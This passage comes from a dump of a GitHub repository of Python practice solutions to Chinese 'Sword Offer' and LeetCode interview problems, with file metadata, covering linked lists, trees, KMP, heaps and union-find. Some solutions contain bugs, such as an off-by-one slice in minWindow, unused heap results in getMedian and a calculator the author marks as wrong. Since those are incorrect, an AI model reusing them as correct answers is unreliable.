"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/8/21 下午2:31\n# @Author : Meng Xiao\nclass Solution:\n def decodeString(self, s):\n s = list(s)\n nums = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n stack = []\n while s:\n char = s.pop(0)\n if char != ']':\n stack.append(char)\n else:\n op1, op2 = '', ''\n popchar = stack.pop()\n while popchar != '[':\n op2 = popchar + op2\n popchar = stack.pop()\n while stack and stack[-1] in nums:\n popchar = stack.pop()\n op1 = popchar + op1\n res = int(op1) * op2\n for char in res:\n stack.append(char)\n return ''.join(stack)\n"
},
{
"alpha_fraction": 0.3744588792324066,
"alphanum_fraction": 0.4015151560306549,
"avg_line_length": 30.86206817626953,
"blob_id": "487e3570e9b535e29fa1f4105bab818bb9482d78",
"content_id": "c42efa4cf87711e9b2c44143678786c8171e6899",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 928,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 29,
"path": "/leetcode-76最小覆盖子串.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/8/21 上午12:23\n# @Author : Meng Xiao\nimport collections\nclass Solution:\n def minWindow(self, s, t):\n if len(s) < len(t):\n return ''\n maps = collections.Counter(t)\n counter = len(maps)\n begin, end, head, length = 0, 0, 0, float('inf')\n while end < len(s):\n if s[end] in maps:\n maps[s[end]] -= 1\n if maps[s[end]] == 0:\n counter -= 1\n end += 1\n while counter == 0:\n if s[begin] in maps:\n maps[s[begin]] += 1\n if maps[s[begin]] > 0:\n counter += 1\n if end - begin < length:\n length = end - begin\n head = begin\n begin += 1\n if length == float('inf'):\n return ''\n return s[head:head+length-1]\n"
},
{
"alpha_fraction": 0.3855421543121338,
"alphanum_fraction": 0.4192771017551422,
"avg_line_length": 23.41176414489746,
"blob_id": "3c08a87b2ac10991e8f21160c434709b9fe36828",
"content_id": "081d8ff38b3dbe7dcb1999ca2110dd36631f2ca6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 419,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 17,
"path": "/第一个只出现一次的字符.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/16 下午4:02\n# @Author : Meng Xiao\nclass Solution:\n def FirstNotRepeatingChar(self, s):\n if not s:\n return\n store = {}\n lis = list(s)\n for i in lis:\n if i not in store.keys():\n store[i] = 0\n store[i] += 1\n for i in lis:\n if store[i] == 1:\n return i\n return\n"
},
{
"alpha_fraction": 0.3324607312679291,
"alphanum_fraction": 0.3656195402145386,
"avg_line_length": 23.404254913330078,
"blob_id": "2d912436c8fe3de50ef98825f59585e2e6d7d17d",
"content_id": "bb2702463c9c41384f59bde966ec7bd4f70cc0d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1178,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 47,
"path": "/leetcode-224计算器.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/8/31 17:13\n# @Author : Meng Xiao\n\n# 计算单独的表达式\ndef eval_(S):\n opt_set1 = ('*', '/')\n opt_set2 = ('+', '-')\n st = [S[0]]\n for i in range(1, len(S)):\n if S[i-1] not in opt_set1:\n st.append(S[i])\n else:\n st.pop()\n if S[i-1] == '*':\n d = int(st.pop()) * int(S[i])\n else:\n d = int(st.pop()) / int(S[i])\n st.append(str(int(d)))\n if len(st) == 1:\n return int(st[0])\n res = 0\n for i in range(1, len(st)):\n if st[i-1] not in opt_set2:\n continue\n if st[i-1] == '+': # 这里不对\n res += int(st[i-2]) + int(st[i])\n else:\n res += int(st[i-2]) - int(st[i])\n return res\n\ndef cal(S): # 先去括号\n st = []\n for s in S:\n if s != ')':\n st.append(s)\n else:\n temp = ''\n tmp = st.pop()\n while tmp != '(':\n temp += tmp\n tmp = st.pop()\n st.append(str(eval_(temp)))\n\n return eval_(''.join(st))\n\nprint(cal(\"(3-(5-(8)-(2+(9-(0-(8-(2))))-(4))-(4)))\"))"
},
{
"alpha_fraction": 0.3776662349700928,
"alphanum_fraction": 0.44667503237724304,
"avg_line_length": 25.566667556762695,
"blob_id": "8145b8a1b9093c468c9329de65d055864f942e46",
"content_id": "37db5242d85f50cddee9da0a7ea44b6aa50d1191",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 801,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 30,
"path": "/两个链表第一个公共节点.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/16 下午7:23\n# @Author : Meng Xiao\nclass Solution:\n def FindFirstCommonNode(self, pHead1, pHead2):\n if not pHead1 or not pHead2:\n return None\n p1, p2 = pHead1, pHead2\n len1 = len2 = 0\n while p1:\n len1 += 1\n p1 = p1.next\n while p2:\n len2 += 1\n p2 = p2.next\n if len1 > len2:\n while len1 - len2:\n pHead1 = pHead1.next\n len1 -= 1\n else:\n while len2 - len1:\n pHead2 = pHead2.next\n len2 -= 1\n while pHead1 and pHead2:\n if pHead1 is pHead2:\n return pHead1\n pHead2 = pHead2.next\n pHead1 = pHead1.next\n\n return None\n"
},
{
"alpha_fraction": 0.4934611916542053,
"alphanum_fraction": 0.5187445282936096,
"avg_line_length": 30.83333396911621,
"blob_id": "cdc116861b76360f0aa0143186fc1900e8f270cb",
"content_id": "0b4833ed7df8fc073a9089a7114a47098f89c256",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1223,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 36,
"path": "/顺时针打印矩阵.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/9 下午4:11\n# @Author : Meng Xiao\nclass Solution:\n\n def printMatrix(self, matrix):\n if not matrix:\n return []\n rows = len(matrix)\n columns = len(matrix[0])\n start = 0\n result = []\n while columns > start*2 and rows > start*2:\n self.printMatrixInCircle(matrix, columns, rows, start, result)\n start += 1\n return result\n\n def printMatrixInCircle(self, matrix, columns, rows, start, result):\n endX = columns - 1 - start\n endY = rows - 1 - start\n # 左至右打印一行\n for i in range(start, endX+1):\n result.append(matrix[start][i])\n\n # 从上到下打印1列\n if start < endY:\n for i in range(start+1, endY+1):\n result.append(matrix[i][endX])\n # 从右往左打印一行\n if start < endX and start < endY:\n for i in range(endX-1, start-1, -1):\n result.append(matrix[endY][i])\n #从下到上打印1列 (至少需要3行两列)\n if start < endX and start + 1 < endY:\n for i in range(endY-1, start, -1):\n result.append(matrix[i][start])\n\n"
},
{
"alpha_fraction": 0.45306387543678284,
"alphanum_fraction": 0.46544981002807617,
"avg_line_length": 25.44827651977539,
"blob_id": "921830ae0f6f50b007289fff444809ec3f4a849f",
"content_id": "39b03089649f1548cd094312a50c744850b6dce0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1732,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 58,
"path": "/二叉排序树插入 删除.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/8/17 19:03\n# @Author : Meng Xiao\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\nclass Solution:\n def InsertBST(self, t, key):\n if not t:\n t = TreeNode(key)\n return t\n if key < t.val:\n t.left = self.InsertBST(t.left, key)\n else:\n t.right = self.InsertBST(t.right, key)\n return t\n\n def DeleteBST(self, root, key):\n\n def findmin(root): # 找到二叉排序树中最小的节点, 即为最左边的节点\n while root.left:\n root = root.left\n return root\n if not root:\n return\n elif key < root.val:\n root.left = self.DeleteBST(root.left, key)\n elif key > root.val:\n root.right = self.DeleteBST(root.right, key)\n \n '''\n 如果x没有子节点,或者只有一个孩子,直接将x“切下”;\n 否则,x有两个孩子,我们用其右子树中的最小值替换掉x,\n 然后将右子树中的这一最小值递归的“切掉”。 \n '''\n else: # root为要删除节点\n if root.left and root.right:\n tmp = findmin(root.right)\n root.val = tmp.val\n root.right = self.DeleteBST(root.right, tmp.val)\n else:\n if not root.left:\n root = root.right\n elif not root.right:\n root = root.left\n return root\n \n \n \n\n\ns = Solution()\nt = TreeNode(5)\narr = [5,2,7,1,4]\nfor x in arr[1:]:\n t = s.InsertBST(t, x)\n"
},
{
"alpha_fraction": 0.4482323229312897,
"alphanum_fraction": 0.4747474789619446,
"avg_line_length": 20.432432174682617,
"blob_id": "c6ed1485c28b97919c9945191d17569ac9363d75",
"content_id": "ca2a07b09e9badc706517aa88d2dda1b734752b7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 854,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 37,
"path": "/1.数组中重复数字.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/3/18 下午3:33\n# @Author : Meng Xiao\n# @File : 1.数组中重复数字.py\n# @Software: PyCharm\ndef swap(i, j, a):\n tmp = a[i]\n a[i] = a[j]\n a[j] = tmp\n return a\ndef repeat_1(list):\n for i in range(len(list)):\n if list[i] != i:\n if list[i] == list[list[i]]:\n return list[i], True\n else:\n swap(list[i], list[list[i]], list)\n else:\n continue\n\n return False\n# 以上为第一种方法\n\n# 方法2 用哈希\ndef repeat_2(list):\n dict1 = dict()\n for i in list:\n if i not in dict1:\n dict1[i] = 1\n else:\n return i, True\n return False\n\nif __name__ == '__main__':\n a = list(map(int, input('请依次输入数组元素\\n').split()))\n #print(repeat_1(a))\n print(repeat_2(a))"
},
{
"alpha_fraction": 0.48901546001434326,
"alphanum_fraction": 0.5134255290031433,
"avg_line_length": 27.581396102905273,
"blob_id": "81d3a0ba8eef4b142fae3e95dbea83eec0b6bc78",
"content_id": "f1abad344686ce01779c7add38f82660e0fe8f82",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1233,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 43,
"path": "/数据流中的中位数.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/13 下午4:07\n# @Author : Meng Xiao\nclass Solution:\n def __init__(self):\n self.left = []\n self.right = []\n self.count = 0\n\n def Insert(self, num):\n if self.count & 1 == 0:\n self.left.append(num)\n else:\n self.right.append(num)\n self.count += 1\n\n def getMedian(self,x ):\n if self.count == 1:\n return self.left[0]\n self.MaxHeap(self.left)\n self.MinHeap(self.right)\n if self.left[0] > self.right[0]:\n self.left[0], self.right[0] = self.right[0], self.left[0]\n self.MaxHeap(self.left)\n self.MinHeap(self.right)\n if self.count & 1 == 0:\n return (self.left[0] + self.right[0]) / 2.0\n else:\n return self.left[0]\n\n def MaxHeap(self, alist):\n import heapq\n max_heap = []\n for i in alist:\n heapq.heappush(max_heap, -i)\n return [-heapq.heappop(max_heap) for i in range(len(alist))]\n\n def MinHeap(self, alist):\n import heapq\n max_heap = []\n for i in alist:\n heapq.heappush(max_heap, i)\n return [heapq.heappop(max_heap) for i in range(len(alist))]\n"
},
{
"alpha_fraction": 0.5372340679168701,
"alphanum_fraction": 0.5957446694374084,
"avg_line_length": 30.16666603088379,
"blob_id": "a22f83fb18d619b51f6aea4a0a29784b41d8b3db",
"content_id": "fa5630a66831e62baa560d6ffa8427afa81d6dd4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 192,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 6,
"path": "/调整数组顺序使奇数位于偶数前面.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/1 下午9:15\n# @Author : Meng Xiao\nclass Solution:\n def reOrderArray(self, array):\n return sorted(array, key=lambda c:c%2, reverse= True )\n\n"
},
{
"alpha_fraction": 0.4804270565509796,
"alphanum_fraction": 0.49347567558288574,
"avg_line_length": 21.756755828857422,
"blob_id": "8d4b86b977b10e95a4946ccc363e8cafc53047d8",
"content_id": "5c461f8aac7f3ce4b9721773293225ec109637ff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 847,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 37,
"path": "/二叉搜索树与双向链表.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/11 下午7:44\n# @Author : Meng Xiao\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\nclass Solution:\n def Convert(self, pRoot):\n if not pRoot:\n return None\n if not pRoot.left and pRoot.right:\n return pRoot\n\n self.Convert(pRoot.left)\n left = pRoot.left\n\n if left:\n while left.right:\n left = left.right\n pRoot.left = left\n left.right = pRoot\n\n self.Convert(pRoot.right)\n right = pRoot.right\n\n if right:\n while right.left:\n right = right.left\n pRoot.right = right\n right.left = pRoot\n\n while pRoot.left:\n pRoot = pRoot.left\n\n return pRoot\n\n"
},
{
"alpha_fraction": 0.49658703804016113,
"alphanum_fraction": 0.5375426411628723,
"avg_line_length": 25.68181800842285,
"blob_id": "5bbd08de90e1387da59c388c831020267100f774",
"content_id": "cd2290355857f1739f06d1fed5ee1c36e037e75f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 590,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 22,
"path": "/合并两个排序链表.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/4 下午4:16\n# @Author : Meng Xiao\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n def Merge(self, pHead1, pHead2):\n if pHead1 == None:\n return pHead2\n if pHead2 == None:\n return pHead1\n\n if pHead1.val < pHead2.val:\n pMergeHead = pHead1\n pMergeHead.next = self.Merge(pHead1.next, pHead2)\n else:\n pMergeHead = pHead2\n pMergeHead.next = self.Merge(pHead1, pHead2.next)\n return pMergeHead"
},
{
"alpha_fraction": 0.3879472613334656,
"alphanum_fraction": 0.41807910799980164,
"avg_line_length": 26.894737243652344,
"blob_id": "cc74e008c2b139e0fd0490ebc21b528c816b36a5",
"content_id": "2a962fb1a40fedac68b0bd1797ea449820b92baa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 535,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 19,
"path": "/和为s的连续正数序列.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/18 下午7:41\n# @Author : Meng Xiao\nclass Solution:\n def FindContinuousSequence(self, tsum):\n # write code here\n small, big = 1, 2\n res = []\n csum = small + big\n while small < big:\n if csum > tsum:\n csum -= small\n small += 1\n else:\n if csum == tsum:\n res.append([i for i in range(small, big+1)])\n big += 1\n csum += big\n return res\n\n"
},
{
"alpha_fraction": 0.546786904335022,
"alphanum_fraction": 0.5749717950820923,
"avg_line_length": 23,
"blob_id": "98aed12c55aaff46a7d680ca83b98cca4bb331e7",
"content_id": "2a72382ab39b51ebef0a6da184b8ae2b5645edfb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1089,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 37,
"path": "/AUC&ROC.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/9/7 14:43\n# @Author : Meng Xiao\n'''\n得到结果数据,数据结构为:输出概率(pctr),标签真值(click)\n对结果数据按输出概率(pctr)进行从大到小排序\n从大到小,把每一个输出概率作为分类阈值,统计该分类阈值下的TPR和FPR\n微元法计算ROC曲线面积、绘制ROC曲线\n'''\nfrom matplotlib import pyplot as plt\ndef get_roc(data, pos, neg):\n data.sort(key=lambda x: x[0], reverse=True)\n roc_arr = []\n tp = fp = 0\n for sample in data:\n tp += (1 if sample[1] == 1 else 0)\n fp += (1 if sample[1] == -1 else 0)\n roc_arr.append((fp/neg, tp/pos))\n return roc_arr\n\ndef draw_roc(roc_arr):\n x = [sample[0] for sample in roc_arr]\n y = [sample[1] for sample in roc_arr]\n plt.title('ROC_curve')\n plt.xlabel('FPR')\n plt.ylabel('TPR')\n plt.plot(x, y)\n plt.show()\n\ndef get_auc(roc_arr):\n # 用微元法计算曲线下面积\n auc = 0.\n prev_x = 0\n for x, y in roc_arr:\n auc += (x-prev_x) * y\n prev_x = x\n return auc"
},
{
"alpha_fraction": 0.49763593077659607,
"alphanum_fraction": 0.5271867513656616,
"avg_line_length": 23.200000762939453,
"blob_id": "9e3e1b80487ec9c4f15ae943f132771ce5b6e1eb",
"content_id": "547c1eefde2ff31d99896c157a288284c28cc782",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 846,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 35,
"path": "/蓄水池采样.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/8/22 19:43\n# @Author : Meng Xiao\nimport random\nclass ReservoirSample:\n def __init__(self, size):\n self._size = size\n self._counter = 0\n self._sample = []\n\n def feed(self, item):\n self._counter += 1\n # i <= k\n if len(self._sample) < self._size:\n self._sample.append(item)\n return self._sample\n # i > k\n rand_int = random.randint(1, self._counter)\n if rand_int <= self._size:\n self._sample[rand_int-1] = item\n return self._sample\n\n\nfrom collections import Counter\n\ndef test_():\n samples = []\n for i in range(10000):\n rs = ReservoirSample(3)\n for item in range(1, 11):\n sample = rs.feed(item)\n samples.extend(sample)\n r = Counter(samples)\n print(r)\ntest_()"
},
{
"alpha_fraction": 0.48653197288513184,
"alphanum_fraction": 0.5,
"avg_line_length": 28.725000381469727,
"blob_id": "1532bb2755e41a2c43dacb8fe1f9e9267a75da2b",
"content_id": "ecc2529abd8aff530c2f9e908a9e7a3a4e0deaa8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1188,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 40,
"path": "/leetcode-547朋友圈.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/8/30 17:01\n# @Author : Meng Xiao\nclass UnionFind:\n def __init__(self, n):\n self.count = n\n self.parent = [i for i in range(n)]\n self.rank = [1 for i in range(n)]\n def get_count(self):\n return self.count\n\n def find_(self, p):\n while p != self.parent[p]:\n self.parent[p] = self.parent[self.parent[p]]\n p = self.parent[p]\n return p\n def is_connected(self, p, q):\n return self.find_(p) == self.find_(q)\n def union(self, p, q):\n p_root = self.find_(p)\n q_root = self.find_(q)\n if p_root == q_root:\n return\n if self.rank[p_root] > self.rank[q_root]:\n self.parent[q_root] = p_root\n elif self.rank[p_root] < self.rank[q_root]:\n self.parent[p_root] = q_root\n else:\n self.parent[q_root] = p_root\n self.rank[p_root] += 1\n self.count -= 1\n\ndef findCircleNum(M):\n n = len(M)\n union_find_set = UnionFind(n)\n for i in range(n):\n for j in range(i):\n if M[i][j] == 1:\n union_find_set.union(j, i)\n return union_find_set.get_count()"
},
{
"alpha_fraction": 0.5144278407096863,
"alphanum_fraction": 0.5253731608390808,
"avg_line_length": 26.189189910888672,
"blob_id": "c3991ea788cf64af6c712d3af8fa5924560e5527",
"content_id": "7cd8554586dfc61b682420f47d9190deee68fff4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1009,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 37,
"path": "/复杂链表的复制.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/11 下午4:21\n# @Author : Meng Xiao\nclass RandomListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n self.random = None\nclass Solution:\n def Clone(self, pHead):\n if not pHead:\n return None\n pNode = pHead\n while pNode:\n pClone = RandomListNode(pNode.val)\n pClone.next = pNode.next\n pNode.next = pClone\n pNode = pClone.next\n\n pNode = pHead\n while pNode:\n pClone = pNode.next\n if pNode.random != None:\n pClone.random = pNode.random.next\n pNode = pClone.next\n\n pNode = pHead\n pCloneHead = pCloneNode = pNode.next\n pNode.next = pCloneHead.next\n pNode = pNode.next\n\n while pNode:\n pCloneNode.next = pNode.next\n pCloneNode = pCloneNode.next\n pNode.next = pCloneNode.next\n pNode = pNode.next\n return pCloneHead"
},
{
"alpha_fraction": 0.4800758957862854,
"alphanum_fraction": 0.5161290168762207,
"avg_line_length": 32,
"blob_id": "9bea7532ad632385344e3794b1987c5130ac5690",
"content_id": "70ff7f8ee671b960cb1c5cb2adb2b5cf8eebade2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 531,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 16,
"path": "/把数组排成最小的数.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/15 下午5:13\n# @Author : Meng Xiao\nclass Solution:\n def printminnumber(self, numbers):\n if not numbers:\n return ''\n str_num = [str(m) for m in numbers]\n for i in range(len(numbers)-1):\n for j in range(i+1, len(numbers)):\n if str_num[i] + str_num[j] > str_num[j] + str_num[i]:\n str_num[i], str_num[j] = str_num[j], str_num[i]\n\n return ''.join(str_num)\ns = Solution()\nprint(s.printminnumber([3,32,321]))"
},
{
"alpha_fraction": 0.420470267534256,
"alphanum_fraction": 0.466113418340683,
"avg_line_length": 20.294116973876953,
"blob_id": "17b813d19d3ade1fd44fc055815c803872ea4007",
"content_id": "26579ae2efcf5abf58121e7c5d4e25ac9388d84f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 861,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 34,
"path": "/约瑟夫环.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/3/19 下午9:18\n# @Author : Meng Xiao\n\ndef josephus(n, m):\n \"\"\"\n 环的问题,\n 共有n个人围成一圈,从1开始报数,数到m时退出,再从1开始,直到所有人退出\n \"\"\"\n people = list(range(1, n+1))\n index = 0\n # 给n个人编号放到people列表中,1号的下标为0\n for i in range(n):\n count = 0\n while count < m:\n if people[index] != 0:\n count += 1\n if count == m:\n print(people[index],'out!')\n #把退出的人编号置0\n people[index] = 0\n index = (index + 1) % n\n return\n\n\n\n# 递推公式法 f(n,m) = (f(n-1,m) + m) % n\ndef josephus1(n, m):\n index = 1\n for i in range(2, n+1):\n index = (index+m) % i\n return index\n\nprint(josephus1(10,6))"
},
{
"alpha_fraction": 0.4150943458080292,
"alphanum_fraction": 0.4375561475753784,
"avg_line_length": 26.121952056884766,
"blob_id": "9925f5f384597fa05e9f1bf6315f53ff4e639fa7",
"content_id": "ab63fde65092d049b8c34713cbe1275ca949ef14",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1129,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 41,
"path": "/数组中的逆序队.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/16 下午4:44\n# @Author : Meng Xiao\ncount = 0\nclass Solution:\n def InversePairs(self, data):\n count = 0\n for item in (sorted(data)):\n count += data.index(item)\n data.remove(item)\n return count\n\n # 归并排序思想\n def InversePairs1(self, data):\n global count\n def MergeSort(lists):\n global count\n if len(lists) <= 1:\n return lists\n num = len(lists) // 2\n left = MergeSort(lists[:num])\n right = MergeSort(lists[num:])\n i, j = 0, 0\n result = []\n while i < len(left) and j < len(right):\n if left[i] < right[j]:\n result.append(left[i])\n i += 1\n else:\n result.append(right[j])\n j += 1\n count += len(left) - i\n\n result += right[j:]\n result += left[i:]\n return result\n MergeSort(data)\n return count\n\ns = Solution()\nprint(s.InversePairs1([7,5,6,4]))\n\n"
},
{
"alpha_fraction": 0.4989224076271057,
"alphanum_fraction": 0.5323275923728943,
"avg_line_length": 29.899999618530273,
"blob_id": "db375df8cade007ca8dec34b95c4167df65cee98",
"content_id": "1a4a55a45580df5f5c7a120284dd26eb05ddf0d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 932,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 30,
"path": "/打印从1到n最大的n位数.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/3/30 下午4:22\n# @Author : Meng Xiao\nclass Solution:\n def PrintNumber(self, number):\n isBeginning0 = True\n nLength = len(number)\n\n for i in range(nLength):\n if isBeginning0 and number[i] != '0':\n isBeginning0 = False\n if not isBeginning0:\n print('%c' %number[i], end='')\n print('')\n\n def Print1ToMaxOfNDigits(self, n):\n if n <= 0:\n return\n number = ['0'] * n\n for i in range(10):\n number[0] = str(i)\n self.Print1ToMaxOfNDigitsRecursively(number, n, 0)\n\n def Print1ToMaxOfNDigitsRecursively(self, number, length, index):\n if index == length - 1:\n self.PrintNumber(number)\n return\n for i in range(10):\n number[index+1] = str(i)\n self.Print1ToMaxOfNDigitsRecursively(number, length, index+1)\n\n"
},
{
"alpha_fraction": 0.42531874775886536,
"alphanum_fraction": 0.4836065471172333,
"avg_line_length": 22.89130401611328,
"blob_id": "5465a212918f90c06f29a7327c75546a30c6f52c",
"content_id": "28375a0b6ddb1236cd15d8058ea06fbf462371cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1184,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 46,
"path": "/1-n整数中1出现的次数.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/14 下午9:14\n# @Author : Meng Xiao\n'''\nhttp://www.cnblogs.com/qiaojushuang/p/7780445.html\n'''\nclass Solution:\n def get_digits(self, n):\n # 求整数n的位数\n ret = 0\n while n:\n ret += 1\n n //= 10\n return ret\n\n def get1digits(self, n):\n # 获取每个位数之间1的总数,n位位数,n=2即10-99\n if n < 0:\n return 0\n if n == 1:\n return 1\n current = 9 * self.get1digits(n-1) + 10 ** (n-1)\n return self.get1digits(n-1) + current\n\n def get1nums(self, n):\n if n < 10:\n return 1 if n >= 1 else 0\n digit = self.get_digits(n) # 获得位数\n low_nums = self.get1digits(digit-1) #最高位之前的1的个数\n high = int(str(n)[0]) #最高位\n low = n - high * 10 ** (digit-1) # 低位\n\n if high == 1:\n high_nums = low + 1\n all_nums = high_nums\n else:\n high_nums = 10 ** (digit-1)\n all_nums = high_nums + low_nums * (high-1)\n return low_nums + all_nums + self.get1nums(low)\n\n\n\n\n\ns = Solution()\nprint(s.get1nums(12))"
},
{
"alpha_fraction": 0.2922990322113037,
"alphanum_fraction": 0.31422147154808044,
"avg_line_length": 23.356164932250977,
"blob_id": "0d35f0e8e0dd06251c4bc206e125d70de4978503",
"content_id": "674d83dc212a168282cda5fe3ce00c3264b05fe7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1873,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 73,
"path": "/字符串匹配(KMP).py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/7/9 20:41\n# @Author : Meng Xiao\n\nclass Solution:\n def violent_match(self, s, p):\n #暴力匹配法\n sLen = len(s)\n pLen = len(p)\n i = 0\n j = 0\n while i < sLen and j < pLen:\n if s[i] == p[j]:\n i += 1\n j += 1\n\n else:\n i = i - j + 1 # i-(j-1)\n j = 0\n if j == pLen:\n return i - j\n else:\n return -1\n\n def kmp_match(self, s, p):\n i, j = 0, 0\n sLen, pLen = len(s), len(p)\n next = self.get_next_p(p)\n print(next)\n while i < sLen and j < pLen:\n if j == -1 or s[i] == p[j]:\n i += 1\n j += 1\n else:\n j = next[j]\n if j == pLen:\n return i - j\n else:\n return -1\n\n def get_next(self, p):\n # 递推方式求next数组(未优化版本)\n pLen = len(p)\n next = [-1] * pLen\n k = -1\n j = 0\n while j < pLen - 1:\n if k == -1 or p[j] == p[k]:\n k += 1\n j += 1\n next[j] = k\n else:\n k = next[k]\n return next\n def get_next_p(self, p):\n # 优化版本, 即p[j]不能等于next[j]\n pLen = len(p)\n next = [-1] * pLen\n k = -1\n j = 0\n while j < pLen - 1:\n if k == -1 or p[j] == p[k]:\n j += 1\n k += 1\n if p[j] != p[k]:\n next[j] = k\n else:\n #因为不能出现p[j] = p[next[j]],所以当出现时需要继续递归,\n # k = next[k] = next[next[k]]\n next[j] = next[k]\n else:\n k = next[k]\n return next\n\n"
},
{
"alpha_fraction": 0.3324742317199707,
"alphanum_fraction": 0.3969072103500366,
"avg_line_length": 21.882352828979492,
"blob_id": "c0ebc75eae998add9889b111dad0ce9117d303d9",
